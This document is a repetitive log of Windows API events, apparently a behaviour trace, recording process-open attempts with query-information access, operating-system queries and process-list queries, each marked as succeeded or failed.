Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = Operating System True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
